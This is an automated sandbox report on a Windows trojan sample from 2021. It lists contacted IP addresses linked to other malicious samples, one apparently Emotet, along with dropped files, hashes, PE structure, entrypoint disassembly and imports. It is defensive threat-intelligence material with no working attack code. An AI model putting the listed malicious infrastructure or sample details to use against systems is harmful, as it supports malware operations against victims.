184.180.181.202	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
176.113.52.6	unknown	Russian Federation	8712	INTA-ASRU	true
68.115.186.26	unknown	United States	20115	CHARTER-20115US	true
201.241.127.190	unknown	Chile	22047	VTRBANDAANCHASACL	true
24.137.76.62	unknown	Canada	11260	EASTLINK-HSICA	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	480340
Start date:	09.09.2021
Start time:	10:03:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0TOEtGJHN8.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@20/10@0/100
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 23.3% (good quality ratio 23.2%) Quality average: 73.5% Quality standard deviation: 19.9%
HCA Information:	Successful, ratio: 82% Number of executed functions: 38 Number of non-executed functions: 31
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.5.146, 23.211.6.115, 40.126.31.7, 40.126.31.138, 40.126.31.140, 40.126.31.9, 40.126.31.5, 40.126.31.136, 40.126.31.3, 20.190.159.131, 13.64.180.106, 23.211.4.86, 20.199.120.85, 20.199.120.182, 20.82.210.154, 40.112.88.60, 93.184.221.240, 173.222.108.210, 173.222.108.226, 20.82.209.104, 80.67.82.211, 80.67.82.235, 20.199.120.151, 20.54.110.249 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, wu.azureedge.net, www.tm.a.prd.aadg.trafficmanager.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:04:11	API Interceptor	1x Sleep call for process: svchost.exe modified
10:05:27	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.4.58.192	boI88C399w.exe	Get hash	malicious	Browse
	boI88C399w.exe	Get hash	malicious	Browse
	v8iFmF7XPp.dll	Get hash	malicious	Browse
	2ojdmC51As.exe	Get hash	malicious	Browse
	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse
102.182.93.220	0TOEtGJHN8.exe	Get hash	malicious	Browse
	boI88C399w.exe	Get hash	malicious	Browse
	boI88C399w.exe	Get hash	malicious	Browse
	2ojdmC51As.exe	Get hash	malicious	Browse
95.9.5.93	0TOEtGJHN8.exe	Get hash	malicious	Browse
	boI88C399w.exe	Get hash	malicious	Browse
	boI88C399w.exe	Get hash	malicious	Browse
	v8iFmF7XPp.dll	Get hash	malicious	Browse
	2ojdmC51As.exe	Get hash	malicious	Browse
	IU-8549 Medical report COVID-19.doc	Get hash	malicious	Browse
94.200.114.161	test-emotet.exe	Get hash	malicious	Browse	94.200.114.161/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTER-KZ	0TOEtGJHN8.exe	Get hash	malicious	Browse	194.4.58.192
	boI88C399w.exe	Get hash	malicious	Browse	194.4.58.192
	boI88C399w.exe	Get hash	malicious	Browse	194.4.58.192
	jax.k.dll	Get hash	malicious	Browse	185.100.65.29
	0519_3361871008218.doc	Get hash	malicious	Browse	185.100.65.29
	fax.f.dll	Get hash	malicious	Browse	185.100.65.29
	0513_3111026702554.doc	Get hash	malicious	Browse	185.100.65.29
	0513_1360918519077.doc	Get hash	malicious	Browse	185.100.65.29
	581a98e7_by_Libranalysis.docm	Get hash	malicious	Browse	185.100.65.29
	Win32.exe	Get hash	malicious	Browse	185.113.134.179
	jers.dll	Get hash	malicious	Browse	185.100.65.29
	v8iFmF7XPp.dll	Get hash	malicious	Browse	194.4.58.192
	wininit.dll	Get hash	malicious	Browse	185.100.65.29
	0408_391585988029.doc	Get hash	malicious	Browse	185.100.65.29
	msals.pumpl.dll	Get hash	malicious	Browse	185.100.65.29
	msals.pumpl.dll	Get hash	malicious	Browse	185.100.65.29
	msals.dll	Get hash	malicious	Browse	185.100.65.29
	NvContainer.exe	Get hash	malicious	Browse	185.113.134.179
	0318_45657944978421.doc	Get hash	malicious	Browse	185.100.65.29
	2ojdmC51As.exe	Get hash	malicious	Browse	194.4.58.192
AfrihostZA	0TOEtGJHN8.exe	Get hash	malicious	Browse	102.182.145.130
	2JOGBbciho	Get hash	malicious	Browse	169.85.189.226
	hzD4UBTK5H	Get hash	malicious	Browse	169.209.50.42
	N2fpnW8P5q	Get hash	malicious	Browse	169.212.193.44
	Darknet.arm7	Get hash	malicious	Browse	102.182.120.199
	7bkrFirKok	Get hash	malicious	Browse	169.82.184.30
	uxHuQqDuZc	Get hash	malicious	Browse	169.217.110.44
	OnRFDWqdnF	Get hash	malicious	Browse	169.43.0.8
	2vMBHaZcM5	Get hash	malicious	Browse	156.155.120.122
	b3astmode.x86	Get hash	malicious	Browse	169.185.9.1
	re.a1rmv4l	Get hash	malicious	Browse	169.174.32.208
	sora.arm7	Get hash	malicious	Browse	169.202.152.130
	AJK7j832D2	Get hash	malicious	Browse	169.108.199.40
	YlmvKUJ5gK	Get hash	malicious	Browse	169.18.199.19
	ENQUIRYSMRT119862021-ERW PIPES.pdf.exe	Get hash	malicious	Browse	169.1.24.244
	mips	Get hash	malicious	Browse	169.108.199.16
	brZRQRhRpd	Get hash	malicious	Browse	169.213.200.228
	0bqzNIp9PV	Get hash	malicious	Browse	169.87.203.46
	KSzA1ujvlV	Get hash	malicious	Browse	169.221.72.136
	y66dLhUn0G	Get hash	malicious	Browse	169.30.45.120

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	0.36205444996716485
Encrypted:	false
SSDEEP:	48:UtcctcMtcctcMtcctcMtcctcQtcctc0tcctc:UtTtDtTtDtTtDtTtTtTtbtTt
MD5:	353C0E84A6C573D30B15481706263B9A
SHA1:	4DCBF5ED97F1251EEF6E0747906368AB5639D0FA
SHA-256:	4412C6044B8C975D5BAB1F0E173339AE2A091A3B4D2DFBF771F1E9B854EF1751
SHA-512:	210B6E533923CF5F3FE255C39E1B2D243F675D2C022FA613E3ABD680FB552A2FD9079BF1699C91A5033AED47E29EE0191CF6E307429554A3128D2C009E047AFD
Malicious:	false
Preview:	.............'..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................).............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.23858527923611406
Encrypted:	false
SSDEEP:	12:bNGaD0JcaaD0JwQQD8JtAg/0bjSQJ2Ali/HsRAls1sOAlTHsRAls1sOAl:bTgJctgJwb8JurjSu230Rf5zRf5
MD5:	3E95B62FD1FF65BF1D1451561D37D781
SHA1:	C061157BDDF36910FB72C06229E257DD79345F0E
SHA-256:	AFEE1D49362E794B42859C5FD7C54AD0EB7B2A3A91F684650D524A886F477C4C
SHA-512:	D2E743919C1707A3C22503690E813A1A70F0AFFCC76245C29B3D4C937B13F29C7EBF1668CB8AEEEAFD0101EB78BE8E404AFD2774AEC162097270A8D4A4C53FAB
Malicious:	false
Preview:	....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x8681bdb8, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.0974673952193926
Encrypted:	false
SSDEEP:	12:Y/0+9XO4blKZGKy/0+9XO4blKZGKu0+9XO4bl2OMZGKu0+9XO4bl2OMZGK2t0+9A:Xf3f3Gw3GwF0lmF0lm5TzTTTzT
MD5:	7EF4473B7A34C26F39DC7F4177D84948
SHA1:	389A8362016E5078CFFDF3A4D1B37A3001D7628E
SHA-256:	905E233BAC7F289623635640280C03246C4BCBE383C3BAF3CB76AE972F494C9B
SHA-512:	8E778B66A10D806DF868C3E936541B7AC950B2492F82B95D48F0EDDE1374FB562085BDDC65691BC3CE2E5FD453565386601DF117B5C604BB57758A3B7DA45E0E
Malicious:	false
Preview:	....... ................e.f.3...w........................&..........w.......yQ.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w...............................................................................................................................................................................................................................................yQ..................pwY.....yQ.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.11588758009323032
Encrypted:	false
SSDEEP:	12:8yNxt43Zx/NxUbteRldTlPxtWOmsRlmWlp6Al+OmsRlZl:8+xOpx/NxUSldZxLDlm27Dl
MD5:	E24DE8A56B2D3CD6849B0FC93667ABB2
SHA1:	099D3BB916A3C0518B4BDFBE88CDAFE8029F15C3
SHA-256:	81ECADE1DDB1325139A5B39D9893B03253B1AE8D98BE4DC20C85C4F19CD4B627
SHA-512:	FA408FD6A75DB8A9181552A6DD6CCC3713ECB823BE573383C0D9F005C393509C1202378A8689E4F0242827A42DB4CD9F41F2F05B82D4D74146A8B1F625125277
Malicious:	false
Preview:	;(.......................................3...w.......yQ......w...............w.......w....:O.....w...................pwY.....yQ.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.d (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2493
Entropy (8bit):	5.231597010571246
Encrypted:	false
SSDEEP:	24:2dS48pX4y/DvKWDkQpydX8ICDKbnTiTBMuT52YGP8EqXpWfKFghR4p/BzceFYMf9:cAn/TLtpuQ6Zhip/B4VM0SkC9+Tu8s
MD5:	B7D5597DC78BA1205B59EA0B1CD8FE77
SHA1:	436E94F5A3157D7DF0FC72CAD7703678A6089536
SHA-256:	2EED515C570006123233A8CBE9455A00C2D6C16823CE505FD5AEB33B46A719B8
SHA-512:	E6B09ECBA06E37C67D55660C09D94736AAB24B355350EBF053859851AB260BF989AE657F3ABB77E346833ACB8D31BADC045455E70979493E322A4FC1768B4A5B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399985333469120</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399985333781637</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399985333469120</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">132459503442223904</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

C:\ProgramData\USOPrivate\UpdateStore\updatestoretemp51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2493
Entropy (8bit):	5.231597010571246
Encrypted:	false
SSDEEP:	24:2dS48pX4y/DvKWDkQpydX8ICDKbnTiTBMuT52YGP8EqXpWfKFghR4p/BzceFYMf9:cAn/TLtpuQ6Zhip/B4VM0SkC9+Tu8s
MD5:	B7D5597DC78BA1205B59EA0B1CD8FE77
SHA1:	436E94F5A3157D7DF0FC72CAD7703678A6089536
SHA-256:	2EED515C570006123233A8CBE9455A00C2D6C16823CE505FD5AEB33B46A719B8
SHA-512:	E6B09ECBA06E37C67D55660C09D94736AAB24B355350EBF053859851AB260BF989AE657F3ABB77E346833ACB8D31BADC045455E70979493E322A4FC1768B4A5B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?><updateStore><sessionVariables><permanent><AUOptions dataType="3">1</AUOptions><AllowMUUpdateService dataType="3">0</AllowMUUpdateService><AreUpdatesPausedByPolicy dataType="11">False</AreUpdatesPausedByPolicy><AttentionRequiredReason dataType="19">0</AttentionRequiredReason><CurrentState dataType="19">1</CurrentState><FirstScanAttemptTime dataType="21">132399985333469120</FirstScanAttemptTime><FlightEnabled dataType="3">0</FlightEnabled><LastError dataType="19">0</LastError><LastErrorState dataType="19">0</LastErrorState><LastErrorStateType dataType="11">False</LastErrorStateType><LastMeteredScanTime dataType="21">132399985333781637</LastMeteredScanTime><LastScanAttemptTime dataType="21">132399985333469120</LastScanAttemptTime><LastScanDeferredReason dataType="19">1</LastScanDeferredReason><LastScanDeferredTime dataType="21">132459503442223904</LastScanDeferredTime><LastScanFailureError dataType="3">-2147023838</LastScanFailureError><LastScanFailu

C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.7686197435894364
Encrypted:	false
SSDEEP:	96:Wi8i0pVZRgZNnAeZ6aZKZ5k907HUZFZoZ0ZAZLpV2ZtZeA3+ZMTn:Wi8i0pPcNnvREKSOKLpqHdoMj
MD5:	2B5184502C6E66FB07BF2F39B708B356
SHA1:	621BC0C77E9F16F4A6B5CE63C554DA035FF457C1
SHA-256:	6F681B095DA38ADD487AF3166A2558579789285B34E394D45522C69052B66BB8
SHA-512:	5CE350A3FDC1D5CA58B0430BF1434B5DDECD83DC17EFE09ECD515051E2DA9838AEA369FB3C655339662C6DCED7DBE59BD090E94E9B365EDF09A3C774731F7A0A
Malicious:	false
Preview:	....................................................................................,....S.......................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................g...(..... ......S..............U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.....,....S......................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration_Temp.1.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.7686197435894364
Encrypted:	false
SSDEEP:	96:Wi8i0pVZRgZNnAeZ6aZKZ5k907HUZFZoZ0ZAZLpV2ZtZeA3+ZMTn:Wi8i0pPcNnvREKSOKLpqHdoMj
MD5:	2B5184502C6E66FB07BF2F39B708B356
SHA1:	621BC0C77E9F16F4A6B5CE63C554DA035FF457C1
SHA-256:	6F681B095DA38ADD487AF3166A2558579789285B34E394D45522C69052B66BB8
SHA-512:	5CE350A3FDC1D5CA58B0430BF1434B5DDECD83DC17EFE09ECD515051E2DA9838AEA369FB3C655339662C6DCED7DBE59BD090E94E9B365EDF09A3C774731F7A0A
Malicious:	false
Preview:	....................................................................................,....S.......................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................g...(..... ......S..............U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.....,....S......................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.1482360894513364
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rkw/L1YZk9+MlWlLehB4yAq7ejC9w/L14I:OaqdmuF3rrj1f+kWReH4yJ7MTj1F
MD5:	94C47122414C60C3C6F9DB839DBD81E5
SHA1:	C2DED01A6605A35454F67EB97AF6BAB732E35321
SHA-256:	3111835B48E9F72B3DD2AD1B8D2655783CE3E1CE3B560834D2B9560466D30E3F
SHA-512:	A57065E4A286A1030E9BB642036301062C33D0E0B6853901CEA8476D30DCE37B87BFB636E66D273DFB13A61A7BE5772588797FB026D1A64C71EAEF2E19B0D74C
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. S.e.p. .. 0.9. .. 2.0.2.1. .1.0.:.0.5.:.2.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. S.e.p. .. 0.9. .. 2.0.2.1. .1.0.:.0.5.:.2.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.4617069558872
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0TOEtGJHN8.exe
File size:	364544
MD5:	3639d17c4944743ac5c70c4e1bd30178
SHA1:	0047a882cf542b94754496c8cb985ab64561f72c
SHA256:	2cb7516c937ad8b9467ca417530651e34340d231c3696149c7d7b22e24ffaf9b
SHA512:	efbc3c75d893baa3e5fc5329ef7bc3163e686850f9196e2ba758b486b18743fd2487476976d6c55b826da2ab1a017ae854af0c53d4b95865a5221a387ba9ad11
SSDEEP:	6144:5uBkiwzntFj3OB0LPJQOZGhcvSSj2x+TGLNs3EtU7L:5HbFTOAQIacvSS6oqLFtsL
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y....c...c...c.......c...\|...c...\|...c...\|...c.......c...c..ic...\|...c...e...c..Rich.c..........PE..L...z.._...................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40a274
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5F9C077A [Fri Oct 30 12:30:50 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c9f7e018b269f1b5fe81cf757d6f8e93

Entrypoint Preview

Instruction
push ebp
push esp
pop ebp
push FFFFFFFFh
push 0040C000h
push 0040A424h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00C1E598h]
pop ecx
or dword ptr [00C1DA4Ch], FFFFFFFFh
or dword ptr [00C1DA5Ch], FFFFFFFFh
call dword ptr [00C1E53Ch]
mov ecx, dword ptr [00C1DA3Ch]
mov dword ptr [eax], ecx
call dword ptr [00C1E540h]
mov ecx, dword ptr [00C1DA38h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00C1E544h]
mov eax, dword ptr [eax]
mov dword ptr [00C1DA40h], eax
call 00007F7830E33733h
cmp dword ptr [0040DA00h], ebx
jne 00007F7830E3360Eh
push 0040A40Eh
call dword ptr [00C1E548h]
pop ecx
call 00007F7830E336FFh
push 0040D418h
push 0040D314h
call 00007F7830E336EAh
mov eax, dword ptr [00C1DA34h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00C1DA30h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00C1E550h]
push 0040D210h
push 0040D000h
call 00007F7830E336B7h

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[C++] VS98 (6.0) build 8168
[LNK] VS98 (6.0) imp/exp build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x81e000	0x8c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x820000	0x41d76	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x862000	0x1184	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x81e3bc	0x330	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa45f	0xb000	False	0.327281605114	data	5.39094221826	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x10e	0x1000	False	0.00927734375	data	0.0298850891201	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xd000	0x810a60	0x1000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x81e000	0x1168	0x2000	False	0.19482421875	data	2.91471949984	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x820000	0x41d76	0x42000	False	0.752877900095	data	7.04184498603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x862000	0x6f5e	0x7000	False	0.135777064732	data	1.65586384416	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x820f50	0x4ee8	data	English	United States
RT_MENU	0x820430	0x168	data	English	United States
RT_DIALOG	0x820598	0x224	data	English	United States
RT_DIALOG	0x820ea8	0xa6	data	English	United States
RT_DIALOG	0x8207c0	0x3fa	data	English	United States
RT_DIALOG	0x820bc0	0x290	data	English	United States
RT_DIALOG	0x820e50	0x54	data	English	United States
RT_STRING	0x856d70	0x50	data	English	United States
RT_RCDATA	0x825e38	0x30f33	data	English	United States

Imports

DLL	Import
KERNEL32.dll	WinExec, LoadLibraryA, GetProcAddress, WriteFile, GlobalReAlloc, GlobalSize, GetPrivateProfileStringA, WritePrivateProfileStringA, CreateFileA, SetFilePointer, ReadFile, CloseHandle, GlobalAlloc, VirtualAlloc, GlobalLock, GlobalUnlock, GlobalFree, GetModuleHandleExA, GetModuleHandleA, GetStartupInfoA
